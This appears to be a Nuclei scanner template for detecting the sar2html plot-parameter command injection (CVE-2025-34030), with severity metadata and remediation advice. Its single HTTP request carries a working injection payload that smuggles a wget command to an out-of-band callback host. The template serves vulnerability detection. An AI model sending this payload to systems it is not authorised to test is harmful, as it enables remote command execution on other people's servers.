id: CVE-2025-34030
info:
name: sar2html <=3.2.2 Plot Parameter - Remote Code Execution
author: gy741,TATANKA97
severity: critical
description: |
sar2html version 3.2.2 and prior contains an OS command injection vulnerability in the plot parameter of index.php. A remote, unauthenticated attacker can append shell metacharacters to the plot parameter and execute arbitrary operating system commands.
impact: |
Successful exploitation allows unauthenticated remote command execution on the underlying server in the web application process context.
remediation: |
Remove public access to affected sar2html deployments or apply vendor-provided fixes when available. Restrict access to trusted users and monitor for shell metacharacters in requests to index.php with the plot parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-34030
- https://vulncheck.com/advisories/sar2html-command-injection
- https://github.com/cemtan/sar2html
- https://www.exploit-db.com/exploits/47204
- https://www.fortiguard.com/encyclopedia/ips/48624
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
cvss-score: 10.0
cve-id: CVE-2025-34030
epss-score: 0.59067
epss-percentile: 0.98991
cwe-id: CWE-78
metadata:
max-request: 1
vendor: cemtan
product: sar2html
tags: cve,cve2025,sar2html,rce,oast,vkev,vuln
http:
- raw:
- |
GET /index.php?plot=;wget%20http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
Accept: */*
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body
words:
- "sar2html Ver"
- "Select Host"
condition: and
# digest: 490a00463044022013e045c669451b7fc3df49649ebf192597c1ce835cec5e00c4a4a5195000f1b90220180504370211d950e7e1228b16f601af4c7522507a015d2cc35f26d82b8a81d9:922c64590222798bb761d5b6d8e72950